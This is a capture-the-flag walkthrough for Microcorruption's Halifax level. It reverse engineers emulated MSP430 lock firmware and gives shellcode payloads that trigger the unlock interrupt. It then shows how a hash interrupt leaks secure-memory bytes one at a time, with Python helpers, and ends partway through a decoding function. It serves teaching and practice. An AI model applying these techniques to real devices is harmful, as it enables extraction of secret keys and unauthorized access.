Meteorological Opposite of Hell: Secure Element Black Box Firmware Exploitation

James Every
Black Friday, 2023

Abstract

This page is a walkthrough for Halifax, the sixth and final in a recent series of reverse engineering challenges from the embedded systems division at NCC Group.

Executive Summary

Twelve months, two-hundred people, four dozen functioning exploits. This was the first. Here is how to reverse engineer an ABI, black box an enclave, and leak the key in seventy-eight hours or less.

Challenges Deployed:
0800 UTC, October 28th, 2022.
First Working Exploit:
1328 UTC, October 31st, 2022.
First Wayback Machine Snapshot:
1751 UTC, October 31st, 2022
Announcement Post:
October 31st, 2022

Overview

First Working Exploit: 1328 UTC, October 31st, 2022
Blockchain Timestamp: 1831 UTC, October 31st, 2022
Pastebin Timestamp: pastebin.com/hKCp5UgH
Cryptographic Proof of Existence: solution.txt solution.txt.ots
Solve Count At Time Of Writing: 45
Solves Per Month: 3.52
Reading Time: 45 minutes

Rendering Note:

There is a known issue with Android lacking a true monospace system font, which breaks many of the extended ASCII diagrams below. To avoid rendering issues, please view this page in a Chrome- or Firefox-based desktop browser, ideally on a Linux host.

Background

The following is a walkthrough for the last in the new series of Microcorruption challenges. The original CTF-turned-wargame was developed a decade ago by Matasano and centered around a deliberately vulnerable smart lock. The goal for each challenge was simple: write a software exploit to trigger an unlock.

NCC Group later acquired Matasano. They continued maintaining the wargame and added half a dozen new challenges on October 28th, 2022, of which this is one.

System Architecture

The emulated device runs on the MSP430 instruction set architecture. It uses a 16-bit little-endian processor and has 64 kilobytes of RAM. The official manual includes the details, but relevant functionality is summarized below.

Interface

Several separate windows control the debugger functionality.

A user input prompt like the following is the device's external communication interface.

Exploit Development Objective

The equivalent of popping a shell on this system is calling interrupt 0x7F. On earlier challenges in the series, there is a dedicated function called unlock_door that does this.

Executing the following shellcode is functionally equivalent to calling the unlock_door function.

Disassembly

3240 00ff      mov     #0xff00, sr
b012 1000      call    #0x10

Assembly

324000ffb0121000

The following message is displayed in the interface when the interrupt is called successfully.

High-Level Analysis

Sample Payload

The debug payload is relatively short, and the load address is read big-endian. The example payload is below.

8000023041

Sample Output

Running the firmware with the example debug payload will produce the following output at the console:

Welcome to the test program loader.
Enabling hardened mode
Verifying 0x7f interrupt disabled
0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt
Internal SRAM Hash:
0865DECED9DEB1245501768025853EA0FE5FAF4D2B7133E2D2F1B8D52ED0588D
Please enter debug payload.
Executing debug payload
Please enter debug payload.

The debug payload is loaded to address 0x8000 and successfully executed.

Manual

The output for the "manual" debugger command contains the following description of the new behavior:

Any payload is allowed, because the unlock key must be passed to the new interrupt with code 0x41, and this key is only stored in secure memory.

Payload Format

The payload format is the same as in Vancouver.

Parsing Format
Load Address	Size (Bytes)	Executable code
`8000`	`02`	`3041 (RET)`
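
The layout in the table above can be reproduced with a small helper. This is a minimal Python sketch, assuming the format is exactly a two-byte big-endian load address, a one-byte size, and the raw code bytes, as the sample payload suggests. The name `build_payload` is hypothetical and not part of the challenge tooling.

```python
def build_payload(load_address: int, code: bytes) -> str:
    """Return the hex string for a debug payload.

    Assumed layout (inferred from the sample payload): a 2-byte
    big-endian load address, a 1-byte size, then the executable code.
    """
    if not 0 <= load_address <= 0xFFFF:
        raise ValueError("load address must fit in 16 bits")
    if len(code) > 0xFF:
        raise ValueError("code must fit in a one-byte size field")
    header = load_address.to_bytes(2, "big") + bytes([len(code)])
    return (header + code).hex()


# A single RET instruction (3041) loaded at 0x8000.
print(build_payload(0x8000, bytes.fromhex("3041")))  # prints 8000023041
```

Computing the size field from the code length avoids hand-editing it each time the shellcode changes.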

Flow Control Graph

The Ghidra flow control graph for the main function is as follows.

Missing Signature Verification

The absence of apparent calls to ed25519_verify suggests that the debug payload lacks signature verification. (Signature verification on St. Johns, Cold Lake, and Churchill relied on this function.) This vulnerability can be confirmed by submitting an arbitrary payload. The crafted payload below includes a size field incremented by two and a second return instruction appended to the end of the executable section.

80000430413041

Breaking at address 0x8000 and continuing execution verifies that this payload is successfully loaded into memory and executed.

Inconsistent Internal SRAM Hash

It is worth noting that the "Internal SRAM Hash" seems to change between runs, which is verifiable by using the reset debugger command and continuing execution from the beginning. Below are two different samples.

Run #1

Welcome to the test program loader.
Enabling hardened mode
Verifying 0x7f interrupt disabled
0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt
Internal SRAM Hash:
B786D20726FB0E6E8EB8ECCD92EFFBEDA6875755722ABE2B15A8D1B4541559CF
Please enter debug payload.

Run #2

Welcome to the test program loader.
Enabling hardened mode
Verifying 0x7f interrupt disabled
0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt
Internal SRAM Hash:
74972D7E94276A0BDE1C3046EF81EFB5B079BACDD171CA6B9C1D6B29CCDBFB39
Please enter debug payload.

Sanity Check

The next step is to verify that the unlock interrupt is disabled, accomplished using the following payload.

Shellcode

800008324000ffb0121000

Payload Structure
Load Address	Size (Bytes)	Executable code
`8000`	`08`	`324000ffb0121000`

Disassembly

3240 00ff      mov       #0xff00, sr
b012 1000      call      #0x10

Breaking at address 0x8000 and single-stepping verifies that the call to address 0x10 happens as usual. However, it returns with no discernible effect, which suggests that the unlock interrupt is disabled.

Reverse Engineering Methodology

Similar Systems

Anyone familiar with the original challenge set will remember that some involved bypassing hardware security modules (HSMs). Detailed writeups for the exploits used to bypass these HSMs already exist elsewhere, but it is worth briefly summarizing how they work because this system may be similar. For this section, emphasis is added unless otherwise noted.

HSM Model 1

3.2 HSM Model 1
The Model 1 of the hardware security module contains a simple interface which allows the MCU to test if an entered password is valid. By default, the interrupt 0x7D will pass a given password to the HSM, and will set a byte in memory if the password entered matches the stored password.
— Microcorruption Manual

Case Study

The Hanoi firmware version employs the HSM Model 1.

The LockIT Pro can send the LockIT Pro HSM-1 a password, and the HSM will return if the password is correct by setting a flag in memory. This [hardware version contains] two available ports: the LockIT Pro Deadbolt should be connected to port 1, and the LockIT Pro HSM-1 should be connected to port 2.
— Hanoi Level Manual

This external device prevents attackers from extracting passwords by dumping the program strings. It takes a pointer to the user-supplied password and returns a boolean indicating whether the supplied credential is correct.

There is code on the MCU that is responsible for checking this boolean and triggering the unlock interrupt if the HSM sets it to true. Exploitation involves a logical buffer overflow to overwrite it and make the conditional check pass.

HSM Model 2

3.3 HSM Model 2
The Model 2 of the hardware security module is a more advanced HSM, with the ability to directly trigger the unlock functionality in the lock. The MCU passes the lock a password, and the HSM will trigger the unlock if the password is valid. By default, the interrupt 0x7E will pass a given password to the HSM, and the lock will be opened if the password entered matches the stored password.
— Microcorruption Manual

Case Study

The Whitehorse firmware version employs the HSM Model 2.

The LockIT Pro can send the LockIT Pro HSM-2 a password, and the HSM will directly send the correct unlock message to the LockIT Pro Deadbolt if the password is correct, otherwise no action is taken. This [hardware version contains] two available ports: the LockIT Pro Deadbolt should be connected to port 1, and the LockIT Pro HSM-2 should be connected to port 2. [...] We have removed the function to unlock the door from the LockIT Pro firmware.
— Whitehorse Level Manual

This description is misleading because it implies that the unlock interrupt is blocked at a hardware level (i.e., only the HSM has deadbolt unlock capabilities), potentially leading an attacker into believing they have to perform black-box analysis against the HSM. In reality, it is possible to exploit a stack overflow and inject malicious code to trigger the unlock interrupt from the MCU.

The Canadian Connection

The disassembly and the status messages indicate that interfacing with external hardware likely requires interrupts 0x40 and 0x41—much like 0x7D and 0x7E from the original challenge set.

Halifax is effectively a next-gen version of Whitehorse. The latter is insecure because it does not block the unlock interrupt at a hardware level, whereas the former might. A successful attack will likely involve a more advanced variation on the process used to exploit the older revision.

Hardware Architecture

Vancouver

The original hardware design, used in Vancouver and most of the previous versions, resembles the following diagram:

The deadbolt is assumed to be an electromechanical device that performs some physical action when supplied with power. Control over this action is equivalent to owning the system. Successfully triggering the unlock interrupt from software most likely causes the processor to pull a GPIO pin high, thus supplying power to the deadbolt and causing it to retract.

Hanoi

Hanoi was the first device version to employ an HSM, relying on it as a secure credential store. Based on the level manual, the hardware architecture resembles the following diagram.

Communications between the MCU and HSM occur over a serial line (or similar). This version of the HSM has no way to trigger the unlock directly, relying instead on the MCU to implement that logic. The hardware architecture of this system is flawed because an attacker with arbitrary code execution on the MCU can ignore the HSM.

Whitehorse

In addition to serving as a secure credential store, the Model 2 HSM can trigger the unlock directly—although this does not prevent the MCU from doing so. Based on the level manual, the hardware architecture resembles the following diagram.

The flaw in the above design is that there is no redundancy. An attacker only needs to exploit one processor to supply power to the deadbolt and can safely ignore the other chip.

This design would require a simple modification to fix: disconnect the MCU from the deadbolt, requiring an attacker to compromise the HSM.

Halifax

Even with the MCU disconnected from the deadbolt, the HSM is still a single point of failure. A better architecture might require consensus among multiple cores before an unlock can be triggered, requiring attackers to compromise the MCU and the HSM in sequence. Preventing an attacker who compromises a single processor from owning the entire system could be accomplished with a hardware architecture resembling the following diagram.

The transistor is assumed to be an AND logic gate, meaning that power physically cannot be supplied to the deadbolt unless the MCU and the HSM pull their bottom pins high. The code on the MCU communicates with the HSM over serial (or similar), authenticates in some capacity, and the HSM pulls its pin high if the authentication is successful. The MCU can then pull its pin high to trigger the unlock.
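
The difference between the conjectured designs can be written as a truth table. The Python sketch below is only a model of the hypothetical wiring described above, not a description of real hardware. The function name and the `and_gate` flag are illustrative assumptions.

```python
def deadbolt_powered(mcu_pin: bool, hsm_pin: bool, and_gate: bool) -> bool:
    """Model whether the deadbolt receives power.

    and_gate=True  -> conjectured Halifax-style design: both pins required.
    and_gate=False -> Whitehorse-style design: either chip can unlock alone.
    """
    if and_gate:
        return mcu_pin and hsm_pin
    return mcu_pin or hsm_pin


# Print the truth table for the conjectured AND-gate design.
for mcu in (False, True):
    for hsm in (False, True):
        print(f"MCU={mcu!s:5} HSM={hsm!s:5} -> {deadbolt_powered(mcu, hsm, and_gate=True)}")
```

Under this model, code execution on the MCU alone is never enough when the gate is present, which is why the HSM becomes the target.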

Attack Surface

There are two different approaches for developing a working attack against this system.

Assume there is no transistor. The unlock interrupt is disabled in software on the MCU, which implies that it might be possible to write shellcode that re-enables it before making the interrupt call.
Assume there is a transistor. The unlock interrupt is disabled at a physics level, requiring exploitation of the HSM to manipulate it into pulling its pin high.

The former mechanism effectively relies on security through obscurity to prevent an attacker from re-enabling the interrupt, which makes it the lower-hanging fruit and the logical next target for analysis. The latter would effectively require black-box analysis of the interface to an undocumented security processor.

Re-Enabling Interrupts From Software

The first approach requires reviewing the documentation for this system and its underlying hardware. The manual PDF supplied with the system does not mention the new functionality, so it is impossible to tell what purpose interrupts 0x40 and 0x41 serve.

The EINT And DINT Instructions

Initial internet searches turn up a salient artifact: one of the manuals for the instruction set architecture contains a reference to instructions that are supposed to disable and enable interrupts.

Attempting to assemble either of these instructions using the provided assembler results in an error:

Error assembling:
TypeError: a.split(...)[1] is undefined

Emulated Instructions

The manual has an asterisk next to these instructions, which the legend indicates are "emulated instructions." Another architecture manual contains a more detailed explanation of this functionality.

There are core instructions that are implemented into hardware, and emulated instructions that use the hardware construction and emulate instructions with high efficiency. The emulated instructions use core instructions with the additional built-in constant generators CG1 and CG2.

The following description follows slightly later.

The assembler accepts the mnemonic of the emulated instruction, and inserts the opcode of the suitable core instruction.

The following table (taken from the same manual) shows the relationship between emulated instructions and core instructions.

The third and fourth lines from the bottom indicate the core instructions equivalent to the emulated DINT and EINT instructions.

Emulated instruction equivalents for disabling/enabling interrupts
Emulated Instruction	Core Instruction
`DINT`	`BIC #8,SR`
`EINT`	`BIS #8,SR`

The naive approach is attempting to globally disable and re-enable all interrupts in the hope of re-enabling the blocked one. A simple test of this functionality would entail calling DINT followed by EINT, but there is one caveat to this approach: according to this forum post, a few NOP instructions must follow DINT because it takes multiple cycles to take effect.
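
For readers without a working assembler, the core-instruction encodings can be derived by hand. The Python sketch below packs the MSP430 double-operand instruction format and relies on the constant generators: R2 in source addressing mode 0b11 yields the constant 8, and R3 in mode 0b00 yields 0. The helper name `encode_format1` is hypothetical. NOP is taken here to be `MOV #0, R3`, the usual emulation.

```python
import struct

# Opcodes for the double-operand (format I) instructions used here.
OPCODES = {"MOV": 0x4, "BIC": 0xC, "BIS": 0xD}

SR = 2   # R2 doubles as the status register and constant generator 1
CG2 = 3  # R3 is constant generator 2


def encode_format1(mnemonic, src_reg, as_mode, dst_reg, ad_mode=0, byte_op=0):
    """Pack one format I instruction word and return it little-endian."""
    word = (
        (OPCODES[mnemonic] << 12)
        | (src_reg << 8)
        | (ad_mode << 7)
        | (byte_op << 6)
        | (as_mode << 4)
        | dst_reg
    )
    return struct.pack("<H", word)


DINT = encode_format1("BIC", SR, 0b11, SR)   # BIC #8, SR
EINT = encode_format1("BIS", SR, 0b11, SR)   # BIS #8, SR
NOP = encode_format1("MOV", CG2, 0b00, CG2)  # MOV #0, R3

print(DINT.hex(), EINT.hex(), NOP.hex())  # prints 32c2 32d2 0343
```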

Working Around Broken Assemblers

The built-in assembler does not work consistently, so the one from the MSProbe project is used to generate the executable code for the payload section containing the DINT and EINT instructions. This assembler correctly interprets the emulated instructions.

Test Payload

80001c32c2034303430343034332d20343034303430343324000ffb0121000

Payload Structure
Load Address	Size (Bytes)	Executable code
`8000`	`1c`	`32c2 0343 0343 0343 0343 32d2 0343 0343 0343 0343 3240 00ff b012 1000`
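
A long payload like this is easy to mistype, so it helps to split it back into fields before submitting it. The Python sketch below assumes the same three-field layout as the table above. `parse_payload` is a hypothetical helper, and rejecting a size mismatch is this sketch's own check rather than a documented firmware rule.

```python
def parse_payload(hex_string: str):
    """Split a debug payload into (load_address, size, code)."""
    raw = bytes.fromhex(hex_string)
    if len(raw) < 3:
        raise ValueError("payload needs a load address and a size byte")
    load_address = int.from_bytes(raw[:2], "big")
    size = raw[2]
    code = raw[3:]
    if size != len(code):
        raise ValueError(f"size field {size:#x} != code length {len(code):#x}")
    return load_address, size, code


payload = "80001c32c2034303430343034332d20343034303430343324000ffb0121000"
address, size, code = parse_payload(payload)

# Group the code into 16-bit words exactly as they appear in memory.
words = [code[i:i + 2].hex() for i in range(0, len(code), 2)]
print(hex(address), hex(size), " ".join(words))
```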

Disassembly

32c2           bic	#0x8, sr
0343           clr	4
0343           clr	4
0343           clr	4
0343           clr	4
32d2           bis	#0x8, sr
0343           clr	4
0343           clr	4
0343           clr	4
0343           clr	4
3240 00ff      mov	#0xff00, sr
b012 1000      call	#0x10

Testing the above payload on Vancouver confirms that the unlock is triggered, but this does not work on Halifax. The call to 0x10 once again returns without visible effect. With the possibility of re-enabling the interrupt from software eliminated, the only remaining option is black-box analysis of the interface to the secure processor.

Black Box Analysis

The first step is understanding the code that makes interrupt calls to the secure processor interface, which requires a more detailed review of the disassembly and flow control for the main function. Assume that the logical AND transistor is present moving forward.

Static Analysis

Consider the flow control graph from earlier again.

Flow Control Graph

Observing the string printed by each conditional block allows the deduction of its purpose.

Status Messages

Defined Strings
String Address	String	Address of Conditional Block Containing Referencing Code
4634	"Welcome to the test program loader."	443e
4658	"Enabling hardened mode"	443e
466f	"Verifying 0x7f interrupt disabled"	443e
4691	"0x7f interrupt disabled, key stored in internal SRAM"	443e
46c6	"unlock by providing the 16 byte key to 0x41 interrupt"	443e
46fc	"Internal SRAM Hash:"	443e
4710	"0123456789ABCDEF"	44ac
4722	"Please enter debug payload."	44ee
473e	"Invalid payload length"	4524
4755	"Executing debug payload"	452e

The 0x40 interrupt enables "hardened mode", which disables the unlock interrupt. The standard portable shellcode has no discernible effect when executed after this call.

444a:  mov	#0x4658 "Enabling hardened mode", r15
444e:  call	#0x4586 <puts>
4452:  push	#0x0
4454:  push	#0x0
4456:  push	#0x40
445a:  call	#0x4550 <INT>

The firmware behavior confirms this, as it subsequently attempts to call the unlock interrupt to ensure it is disabled.

4462:  mov	#0x466f "Verifying 0x7f interrupt disabled", r15
4466:  call	#0x4586 <puts>
446a:  push	#0x0
446c:  push	#0x0
446e:  push	#0x7f
4472:  call	#0x4550 <INT>

This check is followed in turn by two puts calls to print the following status messages:

0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt

Implementation Conjecture

Based on the above analysis, a few tentative theories emerge.

The 0x40 interrupt causes the secure processor to pull its GPIO pin low, causing the logical AND gate to turn off and thus physically preventing unlock interrupts triggered from the MCU from retracting the deadbolt.
Turning the secure processor's GPIO pin back on requires sending a 16-byte key over the serial line.
The 16-byte key resides in "SRAM", ostensibly standing for "secure RAM" and referring to the internal memory of the secure processor.
The key must be passed to the secure processor through interrupt 0x41, using an undocumented calling convention.

The fact that the SRAM hash changes between runs suggests that the content of SRAM also changes. It is impossible to rule out random key generation or mutation during the initial 0x40 interrupt call.

Hardware Security Background

While it has been convenient to refer to the external hardware as an "HSM" or "secure processor" up to this point, it is worth noting that it could be one of multiple similar things. These hardware security devices fall into four broad categories.

Hardware Security Modules (HSMs)
Trusted Platform Modules (TPMs)
Secure Enclaves or Trusted Execution Environments (TEEs)
Secure Elements (SEs)

WolfSSL has a page summarizing the differences.

It is possible to execute custom code inside TEEs, but this is not true of the other three categories—which usually only run code written by their respective vendors. The lack of boutique code theoretically means that fixing vulnerabilities in secure elements, HSMs, and TPMs is the vendor's responsibility—and it can imply that these chips have undergone more intense security testing. Of course, this claim is speculative, as it is impossible to determine how much review or testing any proprietary codebase has undergone.

One concern is the degree to which the device is Turing complete. Some of these devices could theoretically implement operations using varying amounts of analog logic, which means that exploitation in the traditional sense may not be possible because there is no software on the device to exploit.

Theoretical Attacks

There are a few possible attacks to consider.

Arbitrary code execution on the secure processor.
Authentication bypass due to a logic flaw.
Leaking the key from SRAM.

Arbitrary code execution may not be possible, and attempting to bypass authentication or fuzz the interface would be convoluted without an example of how to communicate with the device.

The compiled code for the implementation may reside in SRAM. Even if it is impossible to extract the key, acquiring an image of the running firmware for further analysis might still be possible. One way or another, an information leak is likely required.

Hunting For Information Leaks

SRAM Hash Calculation

The obvious target for a memory leak is functionality that already reads data from secure memory. The SRAM hash calculation is a likely candidate.

The sha256_internal function wraps an 0x41 interrupt call, which implies that the interrupt used to pass the unlock key is the same one used to compute the SRAM hash.

45b6 <sha256_internal>
45b6:  0d12           push	r13
45b8:  0e12           push	r14
45ba:  0f12           push	r15
45bc:  3012 4100      push	#0x41
45c0:  b012 5045      call	#0x4550 <INT>
45c4:  3152           add	#0x8, sp
45c6:  3041           ret

The setup for that function call is as follows.

The value in R13 is a stack pointer—likely the location where the function returns the computed checksum. Observing stack memory before and after the call confirms this theory.

┌───────────────────────────────────────────────┐
│                     STACK                     │
├───────┬───────────────────────────────────────┤
│ADDRESS│                 DATA                  │
├───────┼───────────────────────────────────────┤
│  43d0 │6445 0100 8245 0000 0a00 a045 0000 9e44│
├───────┼───────────────────────────────────────┤  ┌───┬───────────────┐
│  43e0 │0000 0000 0000 0000 0000 0000 0000 0000│◄─┤R13│CHECKSUM BUFFER│
├───────┼───────────────────────────────────────┤  └───┴───────────────┘
│  43f0 │0000 0000 0000 0000 0000 0000 0000 0000│
└───────┴───────────────────┬───────────────────┘
                            │
                            ▼ CALL
                    ┌───────────────┐
                    │sha256_internal│
                    └───────┬───────┘
                            │
                            ▼ RETURN
┌───────┬───────────────────────────────────────┐
│  43d0 │6445 0000 c445 4100 0000 0010 e043 aa44│
├───────┼───────────────────────────────────────┤  ┌───┬───────────────┐
│  43e0 │c2a1 46c0 e5dc c4db e06c 413d a787 2f06│◄─┤R13│CHECKSUM BUFFER│
├───────┼───────────────────────────────────────┤  └───┴───────────────┘
│  43f0 │ac82 ff94 28f2 d00d 4326 1514 6748 1df2│
└───────┴───────────────────────────────────────┘

The 32-byte value beginning at address 43e0 is the internal SRAM hash, confirmed by the status message printed soon afterward.

Internal SRAM Hash:
C2A146C0E5DCC4DBE06C413DA7872F06AC82FF9428F2D00D4326151467481DF2
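
The printed string can be reproduced from the stack dump. The Python sketch below assumes the firmware converts each byte to two characters using the "0123456789ABCDEF" table at 0x4710, high nibble first. That ordering is an inference from the output, and `to_hex` is a hypothetical name.

```python
HEX_DIGITS = "0123456789ABCDEF"  # same contents as the string at 0x4710


def to_hex(data: bytes) -> str:
    """Render bytes as uppercase hex via a nibble lookup table."""
    out = []
    for byte in data:
        out.append(HEX_DIGITS[byte >> 4])   # high nibble first
        out.append(HEX_DIGITS[byte & 0xF])  # then low nibble
    return "".join(out)


# The 32 bytes at 0x43e0 after the call, copied from the stack diagram.
stack_dump = (
    "c2a1 46c0 e5dc c4db e06c 413d a787 2f06 "
    "ac82 ff94 28f2 d00d 4326 1514 6748 1df2"
)
checksum = bytes.fromhex(stack_dump.replace(" ", ""))
print(to_hex(checksum))
```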

Calling Convention

The purpose of the values passed in R14 and R15 is not immediately apparent.

pc  45c0  sp 43d6  sr 0000  cg 0000
r04 0000 r05 5a08 r06 0000 r07 0000 
r08 0000 r09 0000 r10 0000 r11 0000 
r12 4400 r13 43e0 r14 1000 r15 0000

Breaking at address 0x44a6 and manually setting R15 to 0x100 before the call to sha256_internal results in the following error.

This string is not defined anywhere in the program memory and prints to the debugger console rather than the I/O console.

Further permutations:

Setting R15 to 0x1 produces the same error.
Changing R14 to 0x800 and R15 to 0x1 seems to result in normal behavior.

Address Range Data Hashing

If the sha256_internal function is computing a checksum for a fixed-length block of memory at a known offset, it should logically need only one parameter (the address of the stack buffer to write the returned checksum). The fact that there are two more implies that the interrupt hashes a specific section of SRAM. Such functionality would require two more parameters, i.e., a start and end address.

               ┌───┬────┐                    ┌───┬────┐
               │R15│0002│                    │R14│000e│
               └───┼────┘                    └───┼────┘
                   │                             │
                   ▼                             ▼
┌────┬────────┬────┬────┬────┬────┬────┬────┬────┬────┬────┐
│    │CONTENTS│AAAA│BBBB│CCCC│DDDD│EEEE│FFFF│1111│2222│3333│
│SRAM├────────┼────┼────┼────┼────┼────┼────┼────┼────┼────┤
│    │ADDRESS │0000│0002│0004│0006│0008│000a│000c│000e│0010│
└────┴────────┴────┴────┴────┴────┴────┴────┴────┴────┴────┘

The problem with this theory is that it should be impossible to "exceed SRAM length" by setting the lower of the two values slightly higher. That error implies that one is the start offset and the other is the length.

                                             ┌───┬────┐
                                             │R14│000c│
                                             └───┴────┘

               ┌───┬────┐                ┌───────┬────┐
               │R15│0002│                │R15+R14│000e│
               └───┼────┘                └───────┼────┘
                   │                             │
                   ▼                             ▼
┌────┬────────┬────┬────┬────┬────┬────┬────┬────┬────┬────┐
│    │CONTENTS│AAAA│BBBB│CCCC│DDDD│EEEE│FFFF│1111│2222│3333│
│SRAM├────────┼────┼────┼────┼────┼────┼────┼────┼────┼────┤
│    │ADDRESS │0000│0002│0004│0006│0008│000a│000c│000e│0010│
└────┴────────┴────┴────┴────┴────┴────┴────┴────┴────┴────┘

It makes no sense for the length to be zero (the value passed in R15 by main), which implies that R14 is the length and R15 is the start offset. If R14 contains the value 0x1000, that suggests SRAM is either 4096 or 8192 bytes long—depending on whether secure memory is byte or word addressed.

                                                      ┌───┬────┐
                                                      │R14│1000│
                                                      └───┴────┘

          ┌───┬────┐                              ┌───────┬────┐
          │R15│0000│                              │R15+R14│1000│
          └───┼────┘                              └───────┼────┘
              │                                           │
              ▼                                           ▼
┌────┬────────┬────┬────┬────┬────┬───┬────┬────┬────┬────┐
│    │CONTENTS│1111│2222│3333│4444│...│0000│0000│0000│0000│
│SRAM├────────┼────┼────┼────┼────┼───┼────┼────┼────┼────┤
│    │ADDRESS │0000│0002│0004│0006│...│0FFC│0FFD│0FFE│0FFF│
└────┴────────┴────┴────┴────┴────┴───┴────┴────┴────┴────┘
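
The start-plus-length theory can be checked against the register experiments with a small model. The Python sketch below is a guess at the interrupt's behavior, not recovered code: it assumes byte addressing, a 0x1000-byte SRAM, and a simple bounds check. `sha256_internal_model` and `SramLengthError` are hypothetical names, and the SRAM contents are placeholders.

```python
import hashlib

SRAM_SIZE = 0x1000  # assumed from the length main passes in R14


class SramLengthError(Exception):
    """Stand-in for the debugger-console error about exceeding SRAM length."""


def sha256_internal_model(sram: bytes, start: int, length: int) -> bytes:
    """Hash sram[start:start+length], rejecting out-of-range requests."""
    if start + length > len(sram):
        raise SramLengthError("requested range exceeds SRAM length")
    return hashlib.sha256(sram[start:start + length]).digest()


sram = bytes(SRAM_SIZE)  # placeholder contents; the real SRAM is unknown

# (R15, R14) pairs: the values main uses, then the three manual experiments.
for start, length in [(0x0000, 0x1000), (0x0100, 0x1000), (0x0001, 0x1000), (0x0001, 0x0800)]:
    try:
        sha256_internal_model(sram, start, length)
        print(f"R15={start:#06x} R14={length:#06x}: ok")
    except SramLengthError:
        print(f"R15={start:#06x} R14={length:#06x}: error")
```

The model accepts and rejects the same register combinations as the experiments described above, which is consistent with R15 being the start offset and R14 the length.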

This calling convention implies the existence of an information leak vulnerability: if it is possible to specify any start offset and a length of 0x1, the interrupt should return the SHA256 checksum of a single word—or possibly even a single byte.

                         ┌───┬────┐
                         │R14│0001│
                         └───┴────┘

          ┌───┬────┐ ┌───────┬────┐
          │R15│0000│ │R15+R14│0001│
          └───┼────┘ └───────┼────┘
              │              │
              │              │
              │    ┌─────────┘
              ▼    ▼
┌────┬────────┬────┬────┬────┬────┬────┬───┬────┬────┬────┬────┐
│    │CONTENTS│ 11 │ 11 │2222│3333│4444│...│0000│0000│0000│0000│
│SRAM├────────┼────┼────┼────┼────┼────┼───┼────┼────┼────┼────┤
│    │ADDRESS │0000│0001│0002│0004│0006│...│0FFC│0FFD│0FFE│0FFF│
└────┴────────┴────┴────┴────┴────┴────┴───┴────┴────┴────┴────┘

It is then possible to run all 256 possible individual bytes through sha256 to find which one produced the hash.
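
Because there are only 256 candidates, the search can be precomputed once as a lookup table. This is a minimal Python sketch using the standard `hashlib` module. `recover_byte` is a hypothetical helper, and the "leaked" hash in the example is generated locally as a stand-in for real console output.

```python
import hashlib

# Precompute the SHA-256 digest of every possible single byte.
DIGEST_TO_BYTE = {
    hashlib.sha256(bytes([value])).hexdigest(): value for value in range(256)
}


def recover_byte(printed_hash: str) -> int:
    """Map a hash printed on the I/O console back to the byte it covers."""
    return DIGEST_TO_BYTE[printed_hash.strip().lower()]


# Stand-in for console output: the uppercase hash of the byte 0x41.
leaked = hashlib.sha256(b"\x41").hexdigest().upper()
print(hex(recover_byte(leaked)))  # prints 0x41
```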

Proof Of Concept

Verifying the vulnerability is simple: because any given memory space will generally have many nulls, choosing a random start offset in high memory will likely return the hash of a single null byte. Take a case where R15 is 0x800 and R14 is 0x1.

High Memory Start Offset

                                  ┌───┬────┐
                                  │R14│0001│
                                  └───┴────┘

                   ┌───┬────┐ ┌───────┬────┐
                   │R15│0800│ │R15+R14│0801│
                   └───┼────┘ └───────┼────┘
                       │              │
                       │              │
                       │    ┌─────────┘
                       ▼    ▼
┌────┬────────┬───┬────┬────┬────┬────┬───┐
│    │CONTENTS│...│0000│ 00 │ 00 │0000│...│
│SRAM├────────┼───┼────┼────┼────┼────┼───┤
│    │ADDRESS │...│07FE│0800│0801│0802│...│
└────┴────────┴───┴────┴────┴────┴────┴───┘

Given these parameters, the I/O console will probably print the hash for a single null byte.

Resulting Hash

Internal SRAM Hash:
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D

Known Preimage

A sha256 hash can be calculated in Python using the following code.

python3 -i
>>> import hashlib
>>> import binascii
>>> binascii.hexlify(hashlib.sha256(b'\x00').digest())
b'6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d'

The known hash for a single null byte matches the one printed to the I/O console, confirming that the byte at offset 0x800 in SRAM is 0x00 and that it is possible to checksum individual bytes. The information leak vulnerability exists and is exploitable.

Concerning the workings of hashing algorithms:

It may not be immediately clear why this proves it is possible to leak individual byte values rather than words. To illustrate why this is so, consider the following Python code.

>>> import hashlib
>>> import binascii
>>> binascii.hexlify(hashlib.sha256(b'\x00\x00').digest())
b'96a296d224f285c67bee93c30f8a309157f0daa35dc5b87e410b78630a09cfc7'

Passing a single null byte through a hashing algorithm produces a different output than doing the same with two null bytes. Given an algorithm resistant to collisions (like SHA256), a matching checksum implies that the hashing operation occurs on a single null byte rather than a null word.
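
The same reasoning can be automated by searching all one-byte and two-byte inputs for a match. The Python sketch below is one way to do that. `find_short_preimage` is a hypothetical helper, and the search is only practical because the candidate inputs are so short.

```python
import hashlib
from itertools import product


def find_short_preimage(hex_digest: str, max_len: int = 2):
    """Return the 1..max_len byte input whose SHA-256 matches, or None."""
    target = bytes.fromhex(hex_digest)
    for length in range(1, max_len + 1):
        for candidate in product(range(256), repeat=length):
            data = bytes(candidate)
            if hashlib.sha256(data).digest() == target:
                return data
    return None


console_hash = "6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D"
print(find_short_preimage(console_hash))  # prints b'\x00'
```

A result of length one indicates that the interrupt hashed a single byte. A result of length two would instead point to word-sized reads.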

Exploit Weaponization

While it is convenient to single-step and manually edit register values to leak individual bytes, a more efficient technique is required to extract the entire contents of SRAM. There is already code to call sha256_internal and print the resulting hash to the I/O console.

Loop that prints the SHA256 hash to the I/O console.

All that is required is some payload code to patch in an unconditional branch in the middle of the main function, then run a loop that sets the values for R13, R14, and R15 and branches to address 0x44a6—just before the call to sha256_internal. This payload code will print the hash for every byte in SRAM.
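
Once the device prints one hash per byte, the console output still has to be turned back into bytes on the host. The Python sketch below is one way to do that, assuming each hash appears on its own line as 64 hex characters. `decode_console_log` is a hypothetical helper, and the sample log is synthetic data built for illustration.

```python
import hashlib
import re

# SHA-256 digest of every single byte, keyed by lowercase hex.
DIGEST_TO_BYTE = {hashlib.sha256(bytes([b])).hexdigest(): b for b in range(256)}
HASH_LINE = re.compile(r"^[0-9A-Fa-f]{64}$")


def decode_console_log(log: str) -> bytes:
    """Recover leaked bytes from console text, in the order printed."""
    recovered = bytearray()
    for line in log.splitlines():
        line = line.strip()
        if not HASH_LINE.match(line):
            continue  # status messages and prompts
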